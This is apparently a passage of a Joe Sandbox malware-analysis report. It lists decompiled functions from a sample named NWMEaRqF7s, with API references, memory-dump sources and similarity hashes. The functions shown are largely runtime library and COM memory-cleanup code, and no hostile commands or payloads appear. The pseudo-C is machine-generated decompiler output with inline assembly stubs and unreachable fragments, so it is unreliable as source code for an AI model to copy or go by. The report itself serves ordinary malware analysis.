Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55

EnterCriticalSection.KERNEL32(?,00430745,?,0043FA38,0000000C,0042DD98,004442E0,0043F9D0,00000010,0042CD5E), ref: 0042CD93

Strings

BD, xrefs: 0042CD6F
@ED, xrefs: 0042CD78

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
String ID: @ED$BD
API String ID: 3996875869-3832678117
Opcode ID: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
Instruction ID: bb51faa7ff948615fe3c82eba944c30b4e22731db9a053301acaced63cb2b748
Opcode Fuzzy Hash: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
Instruction Fuzzy Hash: 9FD022FA71012027EF2816B2BECAB1E2608D2C03423A54E3BF502C6281CE2DEAC1100C

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD70, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0042AD70() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x438170;
					_v28 =  *0x438168;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0042ad75
0x0042ad7d
0x0042ad94
0x0042ad40
0x0042ad49
0x0042ad55
0x0042ad58
0x0042ad5b
0x0042ad5d
0x0042ad60
0x0042ad65
0x0042ad6f
0x0042ad67
0x0042ad6b
0x0042ad6b
0x0042ad7f
0x0042ad85
0x0042ad8d
0x00000000
0x0042ad8f
0x0042ad8f
0x0042ad93
0x0042ad93
0x0042ad8d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0042244D), ref: 0042AD75
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042AD85

Strings

KERNEL32, xrefs: 0042AD70
IsProcessorFeaturePresent, xrefs: 0042AD7F

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
Instruction ID: cd959e317abe6be5cb1291d7da4cfedc1d6fa2a895f225a505106cb1dce581d7
Opcode Fuzzy Hash: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
Instruction Fuzzy Hash: 64C0809035131357DD1117B1AC0D71B301D5B44B83F6024567809E45C0DE5CE010442F

Uniqueness

Uniqueness Score: -1.00%

Function 0041733F, Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041733F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				void* _v168;
				void* _v176;
				void* _v184;
				void* _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x443590; // 0xa920217c
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E0041F6EA(E004331D4, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x439330,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E00413D5B( &_a12,  &_a20, 0x439a5c);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E00413D5B( &_a12,  &_a68, 0x439a44);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x439540, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E0041E5DF(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x439520);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x439660);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E00402EE1(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00416B92(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E00413F84(__ecx, __eax);
						}
						__eax = E00402EE1(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00412BEB(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E0041F330(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E00416BB4( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E00413F41(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E00402EE1(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E0041A1D8(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E00406B97( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E0041A100( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								 *((intOrPtr*)(_t228 - 4)) = 0x442350;
								E0041F7F4(_t228 - 4, 0x43c4ec);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_t10 = _t229 - 4; // 0x442350
								 *((intOrPtr*)(_t229 - 4)) = 0x4423e8;
								E0041F7F4(_t10, 0x43c54c);
								asm("int3");
								_push(_t229);
								_t230 = _t232;
								_push(_t188);
								_t12 = _t230 - 4; // 0x4423e8
								 *((intOrPtr*)(_t230 - 4)) = 0x442480;
								E0041F7F4(_t12, 0x43c590);
								asm("int3");
								_push(4);
								E0041F6EA(E00431BFC, _t181, 0, _t222);
								_t214 = E0040F014(0x104);
								 *((intOrPtr*)(_t230 - 0x10)) = _t214;
								_t179 = 0;
								 *((intOrPtr*)(_t230 - 4)) = 0;
								if(_t214 != 0) {
									_t179 = E0040D519(_t214);
								}
								return E0041F7C2(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

0x0041733f
0x0041733f
0x00417340
0x00417343
0x00417347
0x0041734e
0x00417351
0x00417358
0x0041735d
0x00417362
0x0041736d
0x00417370
0x004174b5
0x004174b8
0x004174ba
0x004174c9
0x004174d3
0x004174d6
0x004174d8
0x004174e9
0x004174ee
0x004174fd
0x00417500
0x00417503
0x0041750a
0x0041750d
0x00417514
0x00417519
0x0041751c
0x00417523
0x00417529
0x00417530
0x00417533
0x0041753a
0x0041753d
0x0041754a
0x0041754c
0x0041754e
0x00417567
0x0041756a
0x0041756d
0x00417573
0x0041757a
0x0041757d
0x00417580
0x00417586
0x00417589
0x0041758b
0x0041758e
0x004175a4
0x004175a7
0x004175aa
0x004175ad
0x004175b0
0x004175b3
0x004175b9
0x00000000
0x00417590
0x00417590
0x00417596
0x00417596
0x00000000
0x00417550
0x00417550
0x00417556
0x00417559
0x00417559
0x0041754e
0x004174bc
0x004174bc
0x004174bc
0x00000000
0x00417376
0x00417376
0x00417379
0x0041737b
0x00417385
0x00417388
0x0041738a
0x0041738d
0x0041767d
0x00417680
0x00417688
0x00417689
0x0041768a
0x00417690
0x00417695
0x00417699
0x00417393
0x00417393
0x00417396
0x00417398
0x0041739b
0x0041739c
0x004173a1
0x004173a4
0x004173a6
0x004173a8
0x004173ab
0x004173ae
0x004173af
0x004173b4
0x004173b7
0x004173b9
0x004173bd
0x004173bf
0x004173c1
0x004173c4
0x004173c6
0x004173ca
0x004173cd
0x004173cd
0x004173d5
0x004173d8
0x004173db
0x004173de
0x004173de
0x004173e1
0x004173e4
0x004173e7
0x004173e7
0x004173ec
0x004173f1
0x004173f4
0x00417402
0x00417402
0x004173f6
0x004173f9
0x004173fb
0x004173fb
0x00417404
0x00417407
0x0041740a
0x0041740d
0x00417410
0x00417413
0x00417415
0x00417417
0x00417419
0x0041741e
0x0041741e
0x00417425
0x0041742a
0x0041742d
0x0041743e
0x0041743e
0x0041742f
0x00417435
0x00417437
0x00417437
0x00417440
0x00417443
0x00417448
0x0041744f
0x00417452
0x00417455
0x00417458
0x0041745b
0x0041745e
0x00417463
0x00417466
0x00417472
0x00417476
0x0041747c
0x0041747e
0x00417480
0x00417483
0x00417488
0x00417492
0x00417498
0x0041749d
0x004174a3
0x004174a8
0x004174ab
0x004175bc
0x004175bc
0x004175bf
0x004175c2
0x004175c4
0x004175c4
0x004175c6
0x004175c8
0x004175ce
0x004175d1
0x004175d3
0x004175d6
0x004175e3
0x004175e3
0x004175d8
0x004175dc
0x004175dc
0x004175e5
0x004175ec
0x004175ef
0x004175f6
0x004175f9
0x004175f9
0x004175c6
0x004175fe
0x00417601
0x00417603
0x00417605
0x00417608
0x0041760f
0x00417610
0x00417616
0x00417619
0x00417621
0x00417623
0x00417626
0x00417628
0x0041762b
0x00000000
0x00000000
0x00417632
0x0041763f
0x00417646
0x0041764d
0x00417650
0x00417653
0x00000000
0x00000000
0x0041762f
0x00417655
0x00417657
0x0041765c
0x0041765e
0x00417660
0x00417666
0x00417666
0x00417669
0x0041766c
0x0041766c
0x0041766c
0x0041766f
0x00000000
0x0041761e
0x00000000
0x0041766f
0x00417621
0x00417671
0x00417674
0x00417674
0x0041767a
0x0041767a
0x00000000
0x0041748a
0x004037af
0x004037b0
0x004037b2
0x004037bc
0x004037c3
0x004037c8
0x004037c9
0x004037ca
0x004037cc
0x004037d2
0x004037d6
0x004037dd
0x004037e2
0x004037e3
0x004037e4
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x0040382b
0x00417468
0x00417468
0x00000000
0x00417468
0x00417466
0x0041738d

APIs

__EH_prolog3.LIBCMT ref: 00417358
CoTaskMemAlloc.OLE32(?,?), ref: 00417476
_memset.LIBCMT ref: 00417498
CoTaskMemFree.OLE32(?), ref: 00417674

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
Instruction ID: b46673a723d36e3b76cc53f0188287a817d86e82d50fda7b55772a3566616555
Opcode Fuzzy Hash: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
Instruction Fuzzy Hash: 17C11A70604709AFCB14DF69C884AAAB7F5FF88314B20891EF816CB391D778E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004181EB, Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E004181EB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E0041F6EA(E004332B3, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x436a4c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E0041A100(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E00416BFF(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E00412C14( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E00412C14(_t161);
								_push(_t161);
								E00402F0C(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E00417FCA(_t162, _t193);
								_push(_t162);
								E00402F0C(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E0041F7C2(E0041A1FB( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E00406B97(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E0041A100( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E00402F0C(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E00402F0C(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x439520);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x439660);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

0x004181eb
0x004181f2
0x004181f7
0x004181f9
0x004181fc
0x00418207
0x0041820a
0x00000000
0x00418290
0x0041826f
0x00418272
0x00418274
0x00000000
0x00000000
0x00418276
0x00418278
0x0041827a
0x00000000
0x00000000
0x00418282
0x0041828a
0x0041828a
0x00418298
0x0041829b
0x004182a3
0x004182dd
0x004182dd
0x004182e2
0x004182e7
0x004182e7
0x004182ea
0x004182ef
0x004182f4
0x004182f4
0x004182fa
0x00418369
0x00418369
0x0041836e
0x00418371
0x00418371
0x00418377
0x0041837c
0x00418383
0x0041838b
0x0041838b
0x00418390
0x00418393
0x00418395
0x00418399
0x0041839e
0x0041839f
0x004183a4
0x004183a5
0x004183a8
0x004183aa
0x004183ae
0x004183b3
0x004183b4
0x004183b9
0x004183ba
0x004183bf
0x004183c4
0x004183c4
0x004183c7
0x004183cc
0x004183d1
0x004183d1
0x004183d7
0x004183e5
0x004182fc
0x004182ff
0x00418302
0x00418360
0x00418363
0x00000000
0x00418363
0x00418304
0x00418306
0x0041830d
0x00418312
0x00418315
0x00000000
0x00000000
0x00000000
0x00000000
0x00418317
0x00418317
0x0041832c
0x0041832c
0x00418334
0x0041833b
0x00418343
0x00418349
0x0041834f
0x0041834f
0x00418352
0x00418358
0x0041835b
0x00000000
0x00418306
0x004182fa
0x004182a5
0x004182aa
0x004182c9
0x004182c9
0x004182cb
0x004182ce
0x004182d3
0x004182d6
0x004182dc
0x00000000
0x004182c9
0x004182ac
0x004182af
0x004182b6
0x004182bc
0x004182c0
0x004182c1
0x004182c6
0x00000000
0x004182c6
0x00418210
0x00418215
0x00000000
0x00000000
0x00418217
0x0041821e
0x0041821f
0x00418224
0x00418229
0x00000000
0x00000000
0x0041822b
0x00418230
0x00000000
0x00000000
0x00418235
0x00418236
0x0041823b
0x00418240
0x00418246
0x00418248
0x0041824d
0x00418255
0x00418258
0x0041825e
0x0041825e
0x0041824d
0x00418261
0x00418267
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 004181F2
VariantClear.OLEAUT32(?), ref: 004182B6
CoTaskMemFree.OLE32(?,00000010), ref: 00418363
CoTaskMemFree.OLE32(?,00000010), ref: 00418371

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
Instruction ID: 59d339b82a7be658d62f54fd823bf36d6654d79d954229c5207d740f0b8cb97e
Opcode Fuzzy Hash: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
Instruction Fuzzy Hash: FD713871A00A069FCB20DFA5C9C49AEB7F1BF48304724096EE556DB661CB39EC81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 022421A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022421F9
SetLastError.KERNEL32(0000007E), ref: 0224223B

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 1507b21e0b8afc40092b3418b41c9e4713093c8a94b41042287dd16bbe8cc815
